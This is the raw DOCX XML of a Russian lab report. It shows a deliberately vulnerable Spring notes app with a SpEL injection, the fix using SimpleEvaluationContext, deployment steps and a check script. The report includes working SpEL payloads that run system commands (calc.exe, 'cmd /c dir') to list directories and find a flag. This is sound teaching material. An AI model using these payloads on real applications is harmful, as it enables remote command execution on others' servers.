    <w:p w14:paraId="3BA548E2" w14:textId="6240C1FC" w:rsidR="00DD5910" w:rsidRDefault="00DD5910" w:rsidP="00AE10F2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Реализация лабораторной работы, которая показывает, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A27C8C9" w14:textId="4D77E970" w:rsidR="00502044" w:rsidRDefault="00AE10F2" w:rsidP="00502044">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>К</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE10F2">
        <w:t>ак та или иная уязвимость выглядит на практике</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1975FE67" w14:textId="2C920DCA" w:rsidR="00DF7AF1" w:rsidRDefault="009C4822" w:rsidP="00DF7AF1">
      <w:r>
        <w:t>Приложение представляет собой приложение по созданию заметок. На рис. 1 – рис. 2 представлен интерфейс приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF406D3" w14:textId="4B6F2EB7" w:rsidR="009C4822" w:rsidRDefault="009C4822" w:rsidP="009C4822">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009C4822">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="377E9377" wp14:editId="31C57C71">
            <wp:extent cx="5138567" cy="22487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2493" cy="2250493"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="035FF488" w14:textId="670665E3" w:rsidR="009C4822" w:rsidRDefault="009C4822" w:rsidP="009C4822">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 1 – Стартовая страница</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7FAA5A" w14:textId="466BB509" w:rsidR="009C4822" w:rsidRDefault="009C4822" w:rsidP="009C4822">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009C4822">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2477A0A9" wp14:editId="549E3632">
            <wp:extent cx="5772647" cy="195424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6473" cy="1955541"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0CE5E0" w14:textId="3CFB89B0" w:rsidR="009C4822" w:rsidRDefault="009C4822" w:rsidP="009C4822">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 2 – Страница с заметками</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D13800" w14:textId="7B7B230B" w:rsidR="00511F81" w:rsidRDefault="009C4822" w:rsidP="009C4822">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Стартовая страница имеет ссылку на страницу с заметками. Страница с заметками имеет 2 поля</w:t>
      </w:r>
      <w:r w:rsidRPr="009C4822">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>для ввода</w:t>
      </w:r>
      <w:r w:rsidRPr="009C4822">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r w:rsidRPr="009C4822">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>note</w:t>
      </w:r>
      <w:r w:rsidRPr="009C4822">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFC44FF" w14:textId="3715F552" w:rsidR="00502044" w:rsidRDefault="00502044" w:rsidP="009C4822">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Для обнаружения зависимости можно воспользоваться строкой:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60712706" w14:textId="11A1C2E1" w:rsidR="00502044" w:rsidRPr="00502044" w:rsidRDefault="00502044" w:rsidP="009C4822">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00502044">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>''.class.forName('java.lang.Runtime').getRuntime().exec('calc.exe')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A168C9" w14:textId="729505CC" w:rsidR="00502044" w:rsidRDefault="00502044" w:rsidP="009C4822">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Тогда будет вызван калькулятор (рис.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0C451D" w14:textId="0C7E765D" w:rsidR="00502044" w:rsidRDefault="00502044" w:rsidP="00502044">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00502044">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E8F6F26" wp14:editId="7E9C9C5C">
            <wp:extent cx="5208105" cy="232374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1928" cy="2329913"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8F7BCA" w14:textId="42088E89" w:rsidR="00502044" w:rsidRPr="00502044" w:rsidRDefault="00502044" w:rsidP="00502044">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 3 – Поиск уязвимой строки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CF75A4" w14:textId="081517E1" w:rsidR="009C4822" w:rsidRDefault="009C4822" w:rsidP="00511F81">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">В поле для ввода </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>note</w:t>
      </w:r>
      <w:r w:rsidRPr="009C4822">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>имеется уязвимость.</w:t>
      </w:r>
      <w:r w:rsidRPr="009C4822">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00511F81">
        <w:t xml:space="preserve">Обработка полученных данных происходит с помощью контекста </w:t>
      </w:r>
      <w:r w:rsidR="00511F81" w:rsidRPr="00511F81">
        <w:t>StandardEvaluationContext</w:t>
      </w:r>
      <w:r w:rsidR="00511F81">
        <w:t xml:space="preserve">, который может обращаться к </w:t>
      </w:r>
      <w:r w:rsidR="00511F81" w:rsidRPr="00511F81">
        <w:t>Java-классам</w:t>
      </w:r>
      <w:r w:rsidR="001515FB">
        <w:t xml:space="preserve"> (рис. </w:t>
      </w:r>
      <w:r w:rsidR="00502044">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="001515FB">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15044CB1" w14:textId="78C2BF2A" w:rsidR="001515FB" w:rsidRDefault="001515FB" w:rsidP="001515FB">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001515FB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26078A81" wp14:editId="5FC575F6">
            <wp:extent cx="5559104" cy="2067951"/>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0909" cy="2079782"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="622CAAF0" w14:textId="7343F34E" w:rsidR="001515FB" w:rsidRPr="001515FB" w:rsidRDefault="001515FB" w:rsidP="001515FB">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00502044">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – реализация уязвимости в коде</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B12241" w14:textId="117F22F9" w:rsidR="00511F81" w:rsidRPr="00511F81" w:rsidRDefault="00511F81" w:rsidP="00511F81">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">При вводе в поле </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>note</w:t>
      </w:r>
      <w:r w:rsidRPr="00511F81">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">строки в системе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00511F81">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">рис. </w:t>
      </w:r>
      <w:r w:rsidR="00502044">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00511F81">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057D0335" w14:textId="4DD8485F" w:rsidR="00511F81" w:rsidRDefault="00511F81" w:rsidP="00511F81">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00511F81">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec("cmd /c dir").getInputStream())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7680B5BA" w14:textId="5128927A" w:rsidR="00511F81" w:rsidRPr="00511F81" w:rsidRDefault="00511F81" w:rsidP="00511F81">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Или при вводе в поле </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>note</w:t>
      </w:r>
      <w:r w:rsidRPr="00511F81">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">строки в системе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00511F81">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A70C500" w14:textId="7671659B" w:rsidR="00511F81" w:rsidRDefault="00511F81" w:rsidP="00511F81">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00511F81">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec("cmd /c </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidRPr="00511F81">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>").getInputStream())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7753E6A3" w14:textId="0F81A4F6" w:rsidR="00511F81" w:rsidRDefault="00511F81" w:rsidP="00511F81">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00511F81">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="417A0AA7" wp14:editId="01F783A3">
            <wp:extent cx="4159464" cy="239407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9464" cy="2394073"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA2334E" w14:textId="626E2C54" w:rsidR="00511F81" w:rsidRPr="00511F81" w:rsidRDefault="00511F81" w:rsidP="00511F81">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00502044">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Ввод уязвимости в поле </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E92358B" w14:textId="2D874A23" w:rsidR="00511F81" w:rsidRPr="00511F81" w:rsidRDefault="00511F81" w:rsidP="009C4822">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Будет выведено содержимое корневой папки, в которой можно обнаружить секретную папку с названием </w:t>
      </w:r>
      <w:r w:rsidRPr="00511F81">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>spel</w:t>
      </w:r>
      <w:r w:rsidRPr="00511F81">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>parser</w:t>
      </w:r>
      <w:r w:rsidRPr="00511F81">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00511F81">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="001515FB">
        <w:t xml:space="preserve"> (рис. </w:t>
      </w:r>
      <w:r w:rsidR="00502044">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="001515FB">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35619E16" w14:textId="6900FC09" w:rsidR="009C4822" w:rsidRDefault="00511F81" w:rsidP="009C4822">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00511F81">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A7CBBB7" wp14:editId="113C4187">
            <wp:extent cx="5940425" cy="25755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575560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D1CBEB" w14:textId="744E6BB7" w:rsidR="001515FB" w:rsidRDefault="001515FB" w:rsidP="001515FB">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00502044">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Результат после ввода уязвимости</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BF5818" w14:textId="04276DA2" w:rsidR="001515FB" w:rsidRDefault="001515FB" w:rsidP="001515FB">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Для исправления данной уязвимости необходимо воспользоваться другим, более безопасным контекстом </w:t>
      </w:r>
      <w:r w:rsidRPr="001515FB">
        <w:t>SimpleEvaluationContext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (рис. </w:t>
      </w:r>
      <w:r w:rsidR="00502044">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204445F2" w14:textId="7BD2878C" w:rsidR="001515FB" w:rsidRDefault="001515FB" w:rsidP="001515FB">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001515FB">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FC0645E" wp14:editId="201FB795">
            <wp:extent cx="5940425" cy="23101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10130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A6FD72" w14:textId="08375D48" w:rsidR="001515FB" w:rsidRDefault="001515FB" w:rsidP="001515FB">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00502044">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Реализация исправления </w:t>
      </w:r>
      <w:r w:rsidR="00502044">
        <w:t>уязвимости</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491AC777" w14:textId="231AC085" w:rsidR="001515FB" w:rsidRPr="001515FB" w:rsidRDefault="001515FB" w:rsidP="001515FB">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Данный контекст не позволит выполнить уязвимую строку и данные будут сохранены только в виде строки (рис. </w:t>
      </w:r>
      <w:r w:rsidR="00502044">
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0477F387" w14:textId="20526957" w:rsidR="001515FB" w:rsidRDefault="001515FB" w:rsidP="001515FB">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001515FB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D5AC56F" wp14:editId="2DFC4FB8">
            <wp:extent cx="5940425" cy="19710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971040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="149FEF6C" w14:textId="61023402" w:rsidR="001515FB" w:rsidRPr="001515FB" w:rsidRDefault="001515FB" w:rsidP="001515FB">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00502044">
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Результаты работы после исправления уязвимости</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50193BF3" w14:textId="0C4344C2" w:rsidR="006037E3" w:rsidRDefault="00DD5910" w:rsidP="00AE10F2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Мануал по развертыванию</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339E8F23" w14:textId="7099ECCA" w:rsidR="00502044" w:rsidRDefault="00502044" w:rsidP="00502044">
      <w:r>
        <w:t xml:space="preserve">Код можно скачать на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>github</w:t>
      </w:r>
      <w:r w:rsidRPr="00502044">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">по ссылке: </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="00E565E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/JoolsBlinnikova/SpEL_injection.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5C1DF4B2" w14:textId="0C03DEE6" w:rsidR="00F74680" w:rsidRDefault="00F74680" w:rsidP="00502044">
      <w:r>
        <w:t>Необходимо скачать в папку данный проект:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8AC233" w14:textId="717B099F" w:rsidR="00F74680" w:rsidRDefault="00F74680" w:rsidP="00502044">
      <w:r>
        <w:t>1) Создать папку</w:t>
      </w:r>
      <w:r w:rsidR="00195513">
        <w:t>, зайти в эту папку и выполнить команду</w:t>
      </w:r>
      <w:r w:rsidR="00195513" w:rsidRPr="00195513">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00195513">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00195513">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r w:rsidR="00195513" w:rsidRPr="00195513">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00195513">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>clone</w:t>
      </w:r>
      <w:r w:rsidR="00195513" w:rsidRPr="00195513">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00195513">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidR="00195513" w:rsidRPr="00E565E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/JoolsBlinnikova/SpEL_injection.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="593CF89C" w14:textId="407076C0" w:rsidR="00195513" w:rsidRDefault="00195513" w:rsidP="00502044">
      <w:r w:rsidRPr="00195513">
        <w:t xml:space="preserve">2) </w:t>
      </w:r>
      <w:r>
        <w:t>Затем запустить сервер</w:t>
      </w:r>
      <w:r w:rsidRPr="00195513">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>в данной папке:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5F5230" w14:textId="1CF10116" w:rsidR="00195513" w:rsidRPr="00195513" w:rsidRDefault="00195513" w:rsidP="00195513">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a) mvn clean install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F2842B" w14:textId="030B8728" w:rsidR="00195513" w:rsidRPr="00637834" w:rsidRDefault="00195513" w:rsidP="00502044">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">б) </w:t>
      </w:r>
      <w:r w:rsidRPr="00195513">
        <w:t>mvn tomcat7:run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AB810D" w14:textId="76925F97" w:rsidR="00247B75" w:rsidRDefault="00247B75" w:rsidP="00247B75">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Скрипт проверки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA535EB" w14:textId="1F8D60A8" w:rsidR="00247B75" w:rsidRDefault="00247B75" w:rsidP="00247B75">
      <w:r>
        <w:t xml:space="preserve">Создан </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00247B75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>скрипт проверки</w:t>
      </w:r>
      <w:r w:rsidRPr="00247B75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>и помещен в корневую директорию (рис. 9). Запуск осуществляется из корневой директории с помощью команды:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F351475" w14:textId="7EB6CDF9" w:rsidR="00247B75" w:rsidRPr="00247B75" w:rsidRDefault="00247B75" w:rsidP="00247B75">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00247B75">
        <w:t>checkSpELInjection.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4CAFBE" w14:textId="562B1EFB" w:rsidR="00247B75" w:rsidRDefault="00247B75" w:rsidP="00247B75">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00247B75">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F505947" wp14:editId="1EB39A4C">
            <wp:extent cx="5940425" cy="164211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642110"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6FF0F6" w14:textId="2DAD8750" w:rsidR="00247B75" w:rsidRDefault="00247B75" w:rsidP="00247B75">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 9 – Реализация скрипта проверки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EEBC2F" w14:textId="45B62A05" w:rsidR="00247B75" w:rsidRDefault="00247B75" w:rsidP="00247B75">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Результаты работы скрипта представлены на рис. 10 – рис.11.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F3A098" w14:textId="6F8AA527" w:rsidR="00247B75" w:rsidRDefault="00247B75" w:rsidP="00247B75">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00247B75">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="079A3605" wp14:editId="6FCB911B">
            <wp:extent cx="5727698" cy="76332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8355"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5727994" cy="763364"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF91953" w14:textId="45F7ADB0" w:rsidR="00247B75" w:rsidRDefault="00247B75" w:rsidP="00247B75">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
